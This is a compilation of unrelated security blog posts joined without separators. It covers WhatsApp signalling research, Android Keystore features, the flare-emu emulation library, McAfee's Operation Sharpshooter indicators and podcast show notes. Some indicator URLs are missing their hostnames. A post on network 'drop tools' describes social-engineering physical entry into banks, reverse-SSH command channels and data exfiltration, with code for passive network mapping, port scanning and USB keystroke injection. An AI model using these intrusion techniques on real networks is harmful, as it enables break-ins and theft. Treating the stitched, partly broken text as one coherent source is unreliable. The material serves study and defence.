In the process of looking at this code, it became difficult to verify its functionality without the ability to debug it. Since WhatsApp ships an x86 library for Android, I wondered if it would be possible to run the JSON parser on Linux.

Tavis Ormandy created a tool that can load the library on Linux and run native functions, so long as they do not have a dependency on the JVM. It works by patching the .dynamic ELF section to remove unnecessary dependencies by replacing DT_NEEDED tags with DT_DEBUG tags. We also needed to remove constructors and destructors by changing the DT_FINI_ARRAYSZ and DT_INIT_ARRAYSZ values to zero. With these changes in place, we could load the library using dlopen() and use dlsym() and dlclose() as normal.
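
The .dynamic rewrite can be sketched as a loop over Elf64_Dyn entries. This is a minimal illustration, not Tavis's actual tool; the 16-byte entry layout and tag constants come from the ELF specification.

```python
import struct

# Each Elf64_Dyn entry is two 8-byte fields: d_tag and d_val/d_ptr.
DT_NULL, DT_NEEDED, DT_DEBUG = 0, 1, 21
DT_INIT_ARRAYSZ, DT_FINI_ARRAYSZ = 27, 28

def patch_dynamic(section: bytes) -> bytes:
    """Rewrite a .dynamic section: neutralize DT_NEEDED entries by
    turning them into DT_DEBUG, and zero the init/fini array sizes
    so constructors and destructors never run."""
    out = bytearray(section)
    for off in range(0, len(out), 16):
        d_tag, d_val = struct.unpack_from("<qQ", out, off)
        if d_tag == DT_NULL:      # DT_NULL terminates the table
            break
        if d_tag == DT_NEEDED:
            struct.pack_into("<qQ", out, off, DT_DEBUG, d_val)
        elif d_tag in (DT_INIT_ARRAYSZ, DT_FINI_ARRAYSZ):
            struct.pack_into("<qQ", out, off, d_tag, 0)
    return bytes(out)
```

In practice you would locate the PT_DYNAMIC segment in the library file, apply a rewrite like this in place, and then load the patched library with dlopen().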

Using this tool, I was able to look at the JSON parsing in more detail. I also set up distributed fuzzing of the JSON binary. Unfortunately, it did not uncover any bugs either.

Overall, WhatsApp signalling seemed like a promising attack surface, but we did not find any vulnerabilities in it. There were two areas where we were able to extend the attack surface beyond what is used in the basic call flow. First, it was possible to send signalling messages that should only be sent after a call is answered, and have them processed by the receiving device before the call was answered. Second, it was possible for a peer to send voip_options JSON to another device. WhatsApp could reduce the attack surface of signalling by removing these capabilities.

I made these suggestions to WhatsApp, and they responded that they were already aware of the first issue as well as variants of the second issue. They said they were in the process of limiting what signalling messages can be processed by the device before a call is answered. They had already fixed other issues where a peer can send voip_options JSON to another peer, and fixed the method I reported as well. They said they are also considering adding cryptographic signing to the voip_options parameter so a device can verify it came from the server to further avoid issues like this. We appreciate their quick resolution of the voip_options issue and strong interest in implementing defense-in-depth measures.

In Part 5, we will discuss the conclusions of our research and make recommendations for better securing video conferencing.

New Keystore features keep your slice of Android Pie a little safer

Posted by Lilian Young and Shawn Willden, Android Security; and Frank Salim, Google Pay

[Cross-posted from the Android Developers Blog]

New Android Pie Keystore Features

The Android Keystore provides application developers with a set of cryptographic tools that are designed to secure their users' data. Keystore moves the cryptographic primitives available in software libraries out of the Android OS and into secure hardware. Keys are protected and used only within the secure hardware to protect application secrets from various forms of attacks. Keystore gives applications the ability to specify restrictions on how and when the keys can be used.
Android Pie introduces new capabilities to Keystore. We will be discussing two of these new capabilities in this post. The first enables restrictions on key use so as to protect sensitive information. The second facilitates secure key use while protecting key material from the application or operating system.

Keyguard-bound keys

There are times when a mobile application receives data but doesn't need to immediately access it if the user is not currently using the device. Sensitive information sent to an application while the device screen is locked must remain secure until the user wants access to it. Android Pie addresses this by introducing keyguard-bound cryptographic keys. When the screen is locked, these keys can be used in encryption or verification operations, but are unavailable for decryption or signing. If the device is currently locked with a PIN, pattern, or password, any attempt to use these keys will result in an invalid operation. Keyguard-bound keys protect the user's data while the device is locked, and are only available when the user needs them.
Keyguard binding and authentication binding both function in similar ways, with one important difference: keyguard binding ties the availability of keys directly to the screen lock state, while authentication binding uses a constant timeout. With keyguard binding, the keys become unavailable as soon as the device is locked and are only made available again when the user unlocks the device.
It is worth noting that keyguard binding is enforced by the operating system, not the secure hardware. This is because the secure hardware has no way to know when the screen is locked. Hardware-enforced Android Keystore protection features, like authentication binding, can be combined with keyguard binding for a higher level of security. Furthermore, since keyguard binding is an operating system feature, it's available to any device running Android Pie.
Keys for any algorithm supported by the device can be keyguard-bound. To generate or import a key as keyguard-bound, call setUnlockedDeviceRequired(true) on the KeyGenParameterSpec or KeyProtection builder object at key generation or import.

Secure Key Import

Secure Key Import is a new feature in Android Pie that allows applications to provision existing keys into Keystore in a more secure manner. The origin of the key, a remote server that could be sitting in an on-premise data center or in the cloud, encrypts the secure key using a public wrapping key from the user's device. The encrypted key in the SecureKeyWrapper format, which also contains a description of the ways the imported key is allowed to be used, can only be decrypted in the Keystore hardware belonging to the specific device that generated the wrapping key. Keys are encrypted in transit and remain opaque to the application and operating system, meaning they're only available inside the secure hardware into which they are imported.

Secure Key Import is useful in scenarios where an application intends to share a secret key with an Android device, but wants to prevent the key from being intercepted or from leaving the device. Google Pay uses Secure Key Import to provision some keys on Pixel 3 phones, to prevent the keys from being intercepted or extracted from memory. There are also a variety of enterprise use cases, such as S/MIME encryption keys being recovered from a Certificate Authority's escrow so that the same key can be used to decrypt emails on multiple devices.
To take advantage of this feature, please review this training article. Please note that Secure Key Import is a secure hardware feature, and is therefore only available on select Android Pie devices. To find out if the device supports it, applications can generate a KeyPair with PURPOSE_WRAP_KEY.

FLARE Script Series: Automating Objective-C Code Analysis with Emulation

This blog post is the next episode in the FireEye Labs Advanced Reverse Engineering (FLARE) team Script Series. Today, we are sharing a new IDAPython library – flare-emu – powered by IDA Pro and the Unicorn emulation framework that provides scriptable emulation features for the x86, x86_64, ARM, and ARM64 architectures to reverse engineers. Along with this library, we are also sharing an Objective-C code analysis IDAPython script that uses it. Read on to learn some creative ways that emulation can help solve your code analysis problems and how to use our new IDAPython library to save you lots of time in the process.

Why Emulation?

If you haven’t employed emulation as a means to solve a code analysis problem, then you are missing out! I will highlight some of its benefits and a few use cases in order to give you an idea of how powerful it can be. Emulation is flexible, and many emulation frameworks available today, including Unicorn, are cross-platform. With emulation, you choose which code to emulate and you control the context under which it is executed. Because the emulated code cannot access the system services of the operating system under which it is running, there is little risk of it causing damage. All of these benefits make emulation a great option for ad-hoc experimentation, problem solving, or automation.

Use Cases

  • Decoding/Decryption/Deobfuscation/Decompression – Often during malicious code analysis you will come across a function used to decode, decompress, decrypt, or deobfuscate some useful data such as strings, configuration data, or another payload. If it is a common algorithm, you may be able to identify it by sight or with a plug-in such as signsrch. Unfortunately, this is not often the case. You are then left either to open up a debugger and instrument the sample to decode it for you, or to transpose the function by hand into whatever programming language fits your needs at the time. These options can be time consuming and problematic depending on the complexity of the code and the sample you are analyzing. Here, emulation can often provide a preferable third option. Writing a script that emulates the function for you is akin to having the function available to you as if you wrote it or are calling it from a library. This allows you to reuse the function as many times as it's needed, with varying inputs, without having to open a debugger. This case also applies to self-decrypting shellcode, where you can have the code decrypt itself for you.
  • Data Tracking – With emulation, you have the power to stop and inspect the emulation context at any time using an instruction hook. Pairing a disassembler with an emulator allows you to pause emulation at key instructions and inspect the contents of registers and memory. This allows you to keep tabs on interesting data as it flows through a function. This can have several applications. As previously covered in other blogs in the FLARE script series, Automating Function Argument Extraction and Automating Obfuscated String Decoding, this technique can be used to track the arguments passed to a given function throughout an entire program. Function argument tracking is one of the techniques employed by the Objective-C code analysis tool introduced later in this post. The data tracking technique could also be employed to track the this pointer in C++ code in order to markup object member references, or the return values from calls to GetProcAddress/dlsym in order to rename the variables they are stored in appropriately. There are many possibilities.
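
As a trivial stand-in for the decoding use case above, here is the kind of single-byte XOR decoder you might otherwise re-implement by hand (a toy example with made-up bytes and key; real decoders are rarely this simple, which is exactly when emulating the original routine pays off):

```python
def xor_decode(data: bytes, key: int) -> bytes:
    """Single-byte XOR decode, a classic malware string obfuscation."""
    return bytes(b ^ key for b in data)

# "Hello" obfuscated with the (hypothetical) key 0x6b
decoded = xor_decode(bytes([0x23, 0x0e, 0x07, 0x07, 0x04]), 0x6b)
# decoded == b"Hello"
```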

Introducing flare-emu

The FLARE team is introducing an IDAPython library, flare-emu, that marries IDA Pro’s binary analysis capabilities with Unicorn’s emulation framework to provide the user with an easy-to-use and flexible interface for scripting emulation tasks. flare-emu is designed to handle all the housekeeping of setting up a flexible and robust emulator for its supported architectures so that you can focus on solving your code analysis problems. It currently provides three different interfaces to serve your emulation needs, along with a slew of related helper and utility functions.

  1. emulateRange – This API is used to emulate a range of instructions, or a function, within a user-specified context. It provides options for user-defined hooks for both individual instructions and for when “call” instructions are encountered. The user can decide whether the emulator will skip over, or call into, function calls. Figure 1 shows emulateRange used with both an instruction and call hook to track the return value of GetProcAddress calls and rename global variables to the name of the Windows APIs they will be pointing to. In this example, it was only set to emulate from 0x401514 to 0x40153D. This interface provides an easy way for the user to specify values for given registers and stack arguments. If a bytestring is specified, it is written to the emulator’s memory and the pointer is written to the register or stack variable. After emulation, the user can make use of flare-emu’s utility functions to read data from the emulated memory or registers, or use the Unicorn emulation object that is returned for direct probing in case flare-emu does not expose some functionality you require.

    A small wrapper function for emulateRange, named emulateSelection, can be used to emulate the range of instructions currently highlighted in IDA Pro.

    Figure 1: emulateRange being used to track the return value of GetProcAddress

  2. iterate – This API is used to force emulation down specific branches within a function in order to reach a given target. The user can specify a list of target addresses, or the address of a function from which a list of cross-references to the function is used as the targets, along with a callback for when a target is reached. The targets will be reached, regardless of conditions during emulation that may have caused different branches to be taken. Figure 2 illustrates a set of code branches that iterate has forced to be taken in order to reach its target; the flags set by the cmp instructions are irrelevant.  Like the emulateRange API, options for user-defined hooks for both individual instructions and for when “call” instructions are encountered are provided. An example use of the iterate API is for the function argument tracking technique mentioned earlier in this post.

    Figure 2: A path of emulation determined by the iterate API in order to reach the target address

  3. emulateBytes – This API provides a way to simply emulate a standalone blob of code, such as shellcode. The provided bytes are not added to the IDB and are simply emulated as is. This can be useful for preparing the emulation environment. For example, flare-emu itself uses this API to manipulate a Model Specific Register (MSR) for the ARM64 CPU that is not exposed by Unicorn in order to enable Vector Floating Point (VFP) instructions and register access. Figure 3 shows the code snippet that achieves this. As with emulateRange, the Unicorn emulation object is returned for further probing by the user in case flare-emu does not expose some functionality required by the user.

    Figure 3: flare-emu using emulateBytes to enable VFP for ARM64

API Hooking

As previously stated, flare-emu is designed to make it easy for you to use emulation to solve your code analysis needs. One of the pains of emulation is in dealing with calls into library functions. While flare-emu gives you the option to simply skip over call instructions, or define your own hooks for dealing with specific functions within your call hook routine, it also comes with predefined hooks for over 80 functions! These functions include many of the common C runtime functions for string and memory manipulation that you will encounter, as well as some of their Windows API counterparts.


Figure 4 shows a few blocks of code that call a function that takes a timestamp value and converts it to a string. Figure 5 shows a simple script that uses flare-emu’s iterate API to print the arguments passed to this function for each place it is called. The script also emulates a simple XOR decode function and prints the resulting, decoded string. Figure 6 shows the resulting output of the script.

Figure 4: Calls to a timestamp conversion function

Figure 5: Simple example of flare-emu usage

Figure 6: Output of script shown in Figure 5

Here is a sample script that uses flare-emu to track return values of GetProcAddress and rename the variables they are stored in accordingly. Check out our README for more examples and help with flare-emu.

Introducing objc2_analyzer

Last year, I wrote a blog post to introduce you to reverse engineering Cocoa applications for macOS. That post included a short primer on how Objective-C methods are called under the hood, and how this adversely affects cross-references in IDA Pro and other disassemblers. An IDAPython script named objc2_xrefs_helper was also introduced in the post to help fix these cross-reference issues. If you have not read that blog post, I recommend reading it before continuing with this post, as it provides some context for what makes objc2_analyzer particularly useful. A major shortcoming of objc2_xrefs_helper was that if a selector name was ambiguous, meaning that two or more classes implement a method with the same name, the script was unable to determine which class the referenced selector belonged to at any given location in the binary and had to ignore such cases when fixing cross-references.

Now, with emulation support, this is no longer the case. objc2_analyzer uses the iterate API from flare-emu along with instruction and call hooks that perform Objective-C disassembly analysis in order to determine the id and selector being passed for every call to objc_msgSend variants in a binary. As an added bonus, it can also catch calls made to objc_msgSend variants when the function pointer is stored in a register, which is a very common pattern in Clang (the compiler used by modern versions of Xcode). IDA Pro tries to catch these itself and does a pretty good job, but it doesn’t catch them all. In addition to x86_64, support was also added for the ARM and ARM64 architectures in order to support reverse engineering iOS applications. This script supersedes the older objc2_xrefs_helper script, which has been removed from our repo. And, since the script can perform such data tracking in Objective-C code by using emulation, it can also determine whether an id is a class instance or a class object itself. Additional support has been added to track ivars being passed as ids as well. With all this information, Objective-C-style pseudocode comments are added to each call to objc_msgSend variants that represent the method call being made at each location. An example of the script’s capability is shown in Figure 7 and Figure 8.

Figure 7: Objective-C IDB snippet before running objc2_analyzer

Figure 8: Objective-C IDB snippet after running objc2_analyzer

Observe that the instructions referencing selectors have been patched to instead reference the implementation function itself, making it easy to jump to the implementation during analysis. The comments added to each call make analysis much easier. Cross-references from the implementation functions are also created to point back to the objc_msgSend calls that reference them, as shown in Figure 9.

Figure 9: Cross-references added to IDB for implementation function

It should be noted that every release of IDA Pro starting with 7.0 has brought improvements to Objective-C code analysis and handling. However, at the time of writing, with the latest version of IDA Pro being 7.2, there are still shortcomings that this tool mitigates, along with the immensely helpful comments it adds. objc2_analyzer is available, along with our other IDA Pro plugins and scripts, at our GitHub page.


flare-emu is a flexible tool to include in your arsenal that can be applied to a variety of code analysis problems. Several example problems were presented and solved using it in this blog post, but this is just a glimpse of its possible applications. If you haven’t given emulation a try for solving your code analysis problems, we hope you will now consider it an option. We hope you find value in using these new tools!

Marriott Starwood Breach Spotlights Multiple Cyber Security Issues

Marriott Starwood breach compromises 500 million customers and has far-reaching implications. The Marriott Starwood breach, which exposed the personal data of 500 million guests, was not the largest data breach in terms of size; Yahoo still holds that dubious honor. However, because of the nature of the data stolen, it has the potential for a…


‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure

This post was written with contributions from the McAfee Advanced Threat Research team.  

The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries.

Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.

Read our full analysis of Operation Sharpshooter.

Have we seen this before?

This campaign, while masquerading as legitimate industry job recruitment activity, gathers information to monitor for potential exploitation. Our analysis also indicates similar techniques associated with other job recruitment campaigns.

Global impact

In October and November 2018, the Rising Sun implant appeared in 87 organizations across the globe, predominantly in the United States, based on McAfee telemetry and our analysis. Based on other campaigns with similar behavior, most of the targeted organizations are English speaking or have an English-speaking regional office. This actor has used recruiting as a lure to collect information about targeted individuals of interest or organizations that manage data related to the industries of interest. The McAfee Advanced Threat Research team has observed that the majority of targets were defense and government-related organizations.

Targeted organizations by sector in October 2018. Colors indicate the most prominently affected sector in each country. Source: McAfee® Global Threat Intelligence.

Infection flow of the Rising Sun implant, which eventually sends data to the attacker’s control servers.



Our discovery of this new, high-function implant is another example of how targeted attacks attempt to gain intelligence. The malware moves in several steps. The initial attack vector is a document that contains a weaponized macro to download the next stage, which runs in memory and gathers intelligence. The victim’s data is sent to a control server for monitoring by the actors, who then determine the next steps.

We have not previously observed this implant. Based on our telemetry, we discovered that multiple victims from different industry sectors around the world have reported these indicators.

Was this attack just a first-stage reconnaissance operation, or will there be more? We will continue to monitor this campaign and will report further when we or others in the security industry receive more information. The McAfee Advanced Threat Research team encourages our peers to share their insights and attribution of who is responsible for Operation Sharpshooter.


Indicators of compromise

MITRE ATT&CK™ techniques

  • Account discovery
  • File and directory discovery
  • Process discovery
  • System network configuration discovery
  • System information discovery
  • System network connections discovery
  • System time discovery
  • Automated exfiltration
  • Data encrypted
  • Exfiltration over command and control channel
  • Commonly used port
  • Process injection


File hashes (SHA-1)

  • 8106a30bd35526bded384627d8eebce15da35d17
  • 66776c50bcc79bbcecdbe99960e6ee39c8a31181
  • 668b0df94c6d12ae86711ce24ce79dbe0ee2d463
  • 9b0f22e129c73ce4c21be4122182f6dcbc351c95
  • 31e79093d452426247a56ca0eff860b0ecc86009

Control servers


Document URLs

  • hxxp:// Planning Manager.doc
  • hxxp:// Intelligence Administrator.doc
  • hxxp:// Service Representative.doc?dl=1

McAfee detection

  • RDN/Generic Downloader.x
  • Rising-Sun
  • Rising-Sun-DOC


The post ‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure appeared first on McAfee Blogs.

Notes about hacking with drop tools

In this report, Kaspersky found Eastern European banks hacked with Raspberry Pis and "Bash Bunnies" (DarkVishnya). I thought I'd write up some more detailed notes on this.

Drop tools

A common hacking/pen-testing technique is to drop a box physically on the local network. On this blog, there are articles going back 10 years discussing this. In the old days, this was done with $200 "netbooks" (cheap notebook computers). These days, it can be done with $50 "Raspberry Pi" computers, or even $25 consumer devices reflashed with Linux.

A "Raspberry Pi" is a $35 single board computer, for which you'll need to add about another $15 worth of stuff to get it running (power supply, flash drive, and cables). These are extremely popular hobbyist computers that are used for everything from home servers to robotics to hacking. They have spawned a large number of clones, like the ODROID, Orange Pi, NanoPi, and so on. With a quad-core, 1.4 GHz processor, 2 gigs of RAM, and typically at least 8 gigs of flash, these are pretty powerful computers.

Typically what you'd do is install Kali Linux. This is a Linux "distro" that contains all the tools hackers want to use.

You then drop this box physically on the victim's network. We often called these "dropboxes" in the past, but now that there's a cloud service called "Dropbox", this becomes confusing, so I guess we can call them "drop tools". The advantage of using something like a Raspberry Pi is that it's cheap: once dropped on a victim's network, you probably won't ever get it back again.

Gaining physical access to even secure banks isn't that hard. Sure, getting to the money is tightly controlled, but other parts of the bank aren't nearly as secure. One good trick is to pretend to be a banking inspector. At least in the United States, they'll quickly bend over and spread them if they think you are a regulator. Or, you can pretend to be a maintenance worker there to fix the plumbing. All it takes is a uniform with a logo and what appears to be a valid work order. If questioned, whip out the clipboard and ask them to sign off on the work. Or, if all else fails, just walk in brazenly as if you belong.

Once inside the physical network, you need to find a place to plug something in. Ethernet and power plugs are often underneath/behind furniture, so that's not hard. You might find access to a wiring closet somewhere, as Aaron Swartz famously did. You'll usually have to connect via Ethernet, as it requires no authentication/authorization. If you could connect via WiFi, you could probably do it outside the building using directional antennas without going through all this.

Now that you've got your evil box installed, there is the question of how you remotely access it. It's almost certainly firewalled, preventing any inbound connection.

One choice is to configure it for outbound connections. When doing pentests, I configure reverse SSH command-prompts to a command-and-control server. Another alternative is to create a SSH Tor hidden service. There are a myriad of other ways you might do this. They all suffer the problem that anybody looking at the organization's outbound traffic can notice these connections.

Another alternative is to use the WiFi. This allows you to physically sit outside in the parking lot and connect to the box. This can sometimes be detected using WiFi intrusion prevention systems, though it's not hard to get around that. The downside is that it puts you in some physical jeopardy, because you have to be physically near the building. However, you can mitigate this in some cases, such as sticking a second Raspberry Pi in a nearby bar that is close enough to connect, and then using the bar's Internet connection to hop-scotch on in.

The third alternative, which appears to be the one used in the article above, is to use a 3G/4G modem. You can get such modems for another $15 to $30. You can get "data only" plans, especially through MVNOs, for around $1 to $5 a month, especially prepaid plans that require no identification. These are "low bandwidth" plans designed for IoT command-and-control where only a few megabytes are transferred per month, which is perfect for command-line access to these drop tools.

With all this, you are looking at around $75 for the hardware, software, and 3G/4G plan for a year to remotely connect to a box on the target network.

As an alternative, you might instead use a cheap consumer router reflashed with the OpenWRT Linux distro. A good example would be a GL.iNet device for $19. This is a cheap Chinese manufacturer that makes consumer routers designed specifically for us hackers who want to do creative things with them.

The benefit of such devices is that they look like the sorts of consumer devices that one might find on a local network. Raspberry Pi devices stand out as something suspicious, should they ever be discovered, but a reflashed consumer device looks trustworthy.

The problem with these devices is that they are significantly less powerful than a Raspberry Pi. The typical processor is usually single core around 500 MHz, and the typical memory is only around 32 to 128 megabytes. Moreover, while many hacker tools come precompiled for OpenWRT, you'll end up having to build most of the tools yourself, which can be difficult and frustrating.

Hacking techniques

Once you've got your drop tool plugged into the network, then what do you do?

One question is how noisy you want to be, and how good you think the defenders are. The classic thing to do is run a port scanner like nmap or masscan to map out the network. This is extremely noisy and even clueless companies will investigate.

This can be partly mitigated by spoofing your MAC and IP addresses. However, a properly run network will still be able to trace the addresses back to the proper switch port. Therefore, you might want to play with a bunch of layer 2 tricks. For example, passively watch for devices that get turned off at night, then spoof their MAC addresses during your night-time scans, so that when they come back in the morning, the defenders will trace the problem back to the wrong device.

An easier thing is to passively watch what's going on. In purely passive mode, they really can't detect that you exist at all on the network, other than the fact that the switch port reports something connected. By passively looking at ARP packets, you can get a list of all the devices on your local segment. By passively looking at Windows broadcasts, you can map out large parts of what's going on with Windows. You can also find MacBooks, NAT routers, SIP phones, and so on.
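Passive discovery needs nothing more than a raw socket and a little frame parsing. Here is a rough pure-Python sketch of an ARP watcher (the AF_PACKET socket is Linux-only and needs root; the interface name is an assumption, and the parsing helper itself is portable):

```python
import socket
import struct

def parse_arp(frame: bytes):
    """Parse an Ethernet frame; return (sender_mac, sender_ip) if it is ARP."""
    if len(frame) < 42:                      # 14-byte Ethernet + 28-byte ARP
        return None
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != 0x0806:                  # not ARP
        return None
    sender_mac = frame[22:28]                # ARP "sender hardware address"
    sender_ip = frame[28:32]                 # ARP "sender protocol address"
    mac = ":".join(f"{b:02x}" for b in sender_mac)
    return mac, socket.inet_ntoa(sender_ip)

def watch(interface: str = "eth0"):
    """Passively map the local segment: never transmits a single packet."""
    # AF_PACKET requires Linux and CAP_NET_RAW (typically root).
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))
    s.bind((interface, 0))
    seen = {}
    while True:
        frame = s.recv(65535)
        entry = parse_arp(frame)
        if entry and entry[0] not in seen:
            seen[entry[0]] = entry[1]
            print(f"new device: {entry[0]} -> {entry[1]}")
```

Run it for a few hours and you build up a device inventory without ever sending a packet of your own.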

This allows you to then target individual machines rather than causing a lot of noise on the network, and therefore go undetected.

If you've got a target machine, the typical procedure is to port scan it with nmap, find versions of running software that may have known vulnerabilities, then use metasploit to exploit those vulnerabilities. If it's a web server, you might use something like burpsuite to find things like SQL injection. If it's a Windows desktop/server, you'll start by looking for unauthenticated file shares, attempting man-in-the-middle attacks, or exploiting it with something like EternalBlue.
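nmap does far more (SYN scans, OS and service fingerprinting), but the heart of a TCP connect scan is tiny. A minimal Python sketch, for illustration only:

```python
import socket
from concurrent.futures import ThreadPoolExecutor

def probe(host: str, port: int, timeout: float = 0.5) -> bool:
    """Return True if a full TCP connect() to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def connect_scan(host: str, ports) -> list:
    """TCP connect scan: noisy (full handshakes), but needs no privileges."""
    with ThreadPoolExecutor(max_workers=32) as pool:
        results = pool.map(lambda p: (p, probe(host, p)), ports)
    return sorted(p for p, is_open in results if is_open)
```

Because a connect scan completes full three-way handshakes, it's the noisiest option; nmap's half-open SYN scan is quieter but needs raw-socket privileges.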

The sorts of things you can do are endless; just read any guide on how to use Kali Linux and follow those examples.

Note that your command-line connection may be a low-bandwidth 3G/4G connection, but when it's time to exfiltrate data, you'll probably use the corporate Internet connection to transfer gigabytes of data.

USB hacking tools

The above paper described not only drop tools attached to the network, but also tools attached via USB. This is a wholly separate form of hacking.

According to the description, the hackers used a BashBunny, a $100 USB device. It's a computer that can emulate things like a keyboard.

However, a cheaper alternative is the Raspberry Pi Zero W for $15, with Kali Linux installed, especially a Kali derivative like this one that has USB attack tools built in and configured.

One set of attacks is through a virtual keyboard and mouse. It can keep causing mouse/keyboard activity invisibly in the background to avoid the automatic lockout, then presumably at night, run commands that will download and run evil scripts. A good example is the "fileless PowerShell" scripts mentioned in the article above.
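On a Pi Zero configured as a USB gadget, injecting keystrokes comes down to writing 8-byte HID keyboard reports to the gadget device. A simplified sketch (the /dev/hidg0 path assumes a gadget already configured on the Pi, and only lowercase letters are mapped here):

```python
def hid_report(char: str) -> bytes:
    """Build an 8-byte HID keyboard report: modifier, reserved, 6 keycodes.

    On the HID keyboard usage page, 'a'..'z' are usage IDs 0x04..0x1D;
    this sketch handles lowercase letters only.
    """
    usage = ord(char) - ord("a") + 0x04
    if not 0x04 <= usage <= 0x1D:
        raise ValueError("only a-z in this sketch")
    return bytes([0, 0, usage, 0, 0, 0, 0, 0])

RELEASE = bytes(8)   # all-zero report = all keys released

def type_string(text: str, device: str = "/dev/hidg0"):
    """Send press/release report pairs to a configured USB HID gadget."""
    with open(device, "wb") as hid:
        for ch in text:
            hid.write(hid_report(ch))   # key down
            hid.write(RELEASE)          # key up
            hid.flush()
```

A real payload would map the full keymap (shift modifier, digits, punctuation) and pace the reports, but the mechanism is exactly this.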

This may be combined with emulation of a flash drive. In the old days, hostile flash drives could directly infect a Windows computer once plugged in. These days, that won't happen without interaction by the user -- interaction using a keyboard/mouse, which the device can also emulate.

Another set of attacks is pretending to be a USB Ethernet connection. This allows network attacks, such as those mentioned above, to travel across the USB port, without being detectable on the real network. It also allows additional tricks. For example, it can configure itself to be the default route for Internet (rather than local) access, redirecting all web access to a hostile device on the Internet. In other words, the device will usually be limited in that it doesn't itself have access to the Internet, but it can confuse the network configuration of the Windows device to cause other bad effects.

Another creative use is to emulate a serial port. This works for a lot of consumer devices and things running Linux. This will get you a shell directly on the device, or a login that accepts a default or well-known backdoor password. This is a widespread vulnerability because it's so unexpected.

In theory, any USB device could be emulated. Today's Windows, Linux, and macOS machines have a lot of device drivers that are full of vulnerabilities that can be exploited. However, I don't see any easy-to-use hacking toolkits that'll make this practical for you, so this is still mostly theoretical.


The purpose of this blogpost isn't "how to hack" but "how to defend". Understanding what attackers do is the first step in understanding how to stop them.

Companies need to understand the hardware on their network. They should be able to list all the hardware devices on all their switches and have a running log of any new device that connects. They need to be able to quickly find the physical location of any device, with well-documented cables and tracking of which MAC address belongs to which switch port. Better yet, 802.1X should be used to require authentication on Ethernet just like you require authentication on WiFi.

The same should be done for USB. Whenever a new USB device is plugged into Windows, that should be logged somewhere. I would suggest policies banning USB devices, but they are so useful that such policies become very costly to do right.

Companies should have enough monitoring that they can be notified whenever somebody runs a scanner like nmap. Better yet, they should have honeypot devices and services spread throughout their network that will notify them if somebody is already inside their network.
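A honeypot service can be as simple as a listener on a port no legitimate user should ever touch; any connection at all is worth an alert. A minimal sketch (the alert callback is a stand-in for whatever paging or logging pipeline you actually use):

```python
import socket
import threading
import datetime

def honeypot(port: int, alert=print, host="0.0.0.0"):
    """Listen on a port nothing should ever touch; any connection is an alert."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    bound = srv.getsockname()[1]             # actual port (port=0 picks one)

    def run():
        while True:
            conn, (peer_ip, peer_port) = srv.accept()
            stamp = datetime.datetime.now().isoformat(timespec="seconds")
            alert(f"{stamp} honeypot:{bound} touched by {peer_ip}:{peer_port}")
            conn.close()

    threading.Thread(target=run, daemon=True).start()
    return srv
```

An nmap sweep of the subnet lights up every honeypot at once, which is exactly the signal you want.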


Hacking a target like a bank consists of three main phases: getting in from the outside, moving around inside the network to get to the juicy bits, then stealing money/data (or causing harm). That first stage is usually the hardest, and can be bypassed with physical access, dropping some sort of computer on the network. A $50 device like a Raspberry Pi running Kali Linux is perfect for this.

Every security professional should have experience with this, whether on an actual Raspberry Pi or just a VM on a laptop running Kali. They should run nmap on their network, run burpsuite against their intranet websites, and so on. Of course, this should only be done with the knowledge and permission of their bosses, and ideally, their boss's bosses.

Risky Business #524 — Huawei CFO arrested, US Government dumps on Equifax

This is the last weekly Risky Business podcast for 2018. We’ll be posting a Soap Box edition early next week then going on break until January 9.

In this week’s show Adam Boileau and Patrick Gray discuss the week’s security news:

  • Huawei’s CFO arrested over sanctions violations
  • BT in the UK removes Huawei equipment from 4G network
  • Australia passes controversial surveillance law
  • US House Oversight Committee blasts Equifax in scathing report
  • Bloomberg plays word-games on Super Micro story
  • MOAR

This week’s show is sponsored by Bugcrowd. In this week’s sponsor interview Bugcrowd’s CTO and founder Casey Ellis tells us why his company is launching “pay for effort” products to run alongside bounty programs.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes

US, China executives grow wary about travel after Huawei arrest
Canadian court grants bail to CFO of China's Huawei | Reuters
Michael Kovrig: Canadian ex-diplomat 'held in China' - BBC News
BT removing Huawei equipment from parts of 4G network | Technology | The Guardian
China's cyber-espionage against U.S. is 'more audacious,' NSA official says amid Huawei flap
China spied on African Union headquarters for five years — Quartz Africa
House panel: Equifax breach was ‘entirely preventable’
Committee Releases Report Revealing New Information on Equifax Data Breach - United States House Committee on Oversight and Government Reform
Experian Exposes Apparent Customer Data in Training Manuals - Motherboard
NotPetya leads to unprecedented insurance coverage dispute
Over 40,000 credentials for government portals found online | ZDNet
What's actually in Australia's encryption laws? Everything you need to know | ZDNet
Australia's encryption laws will fall foul of differing definitions | ZDNet
Australia Just Became The Testing Ground For Breaking Into Encryption
Matthew Green on Twitter: "GCHQ has proposal to surveill encrypted messaging and phone calls. The idea is to use weaknesses in the “identity system” to create a surveillance backdoor. This is a bad idea for so many reasons. Thread. 1/"
Melbourne terror attack plot suspects arrested in police raids over mass shooting fears - ABC News (Australian Broadcasting Corporation)
Why Scott Morrison is right on encryption but wrong on Muslims
Super Micro Says Third-Party Test Found No Malicious Hardware - Bloomberg
Someone Defaced Website With ‘Goatse’ And Anti-Diversity Tirade - Motherboard
Nearly 250 Pages of Devastating Internal Facebook Documents Posted Online By UK Parliament - Motherboard
Internal Documents Show Facebook Has Never Deserved Our Trust or Our Data - Motherboard
Google+ Exposed Data of 52.5 Million Users and Will Shut Down in April | WIRED
